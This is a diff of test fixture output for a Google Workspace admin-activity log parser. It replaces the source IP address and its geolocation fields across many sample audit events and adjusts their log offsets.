 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -378,7 +350,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -392,26 +364,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2907,
+ "log.offset": 2900,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -432,7 +400,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -445,26 +413,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3360,
+ "log.offset": 3352,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -485,7 +449,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -499,26 +463,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3759,
+ "log.offset": 3750,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -539,7 +499,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -552,26 +512,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4209,
+ "log.offset": 4199,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -592,7 +548,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -605,26 +561,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4627, + "log.offset": 4616, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -645,7 +597,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -658,26 +610,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5048, + "log.offset": 5036, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -698,7 +646,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -711,26 +659,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5470, + "log.offset": 5457, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -751,7 +695,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -765,26 +709,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5894, + "log.offset": 5880, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -806,7 +746,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -819,26 +759,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 6373, + "log.offset": 6358, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -860,7 +796,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -873,26 +809,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 6803, + "log.offset": 6787, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -914,7 +846,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -928,26 +860,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 7235, + "log.offset": 7218, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -968,7 +896,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", "event.provider": "admin", "event.type": [ "change" 
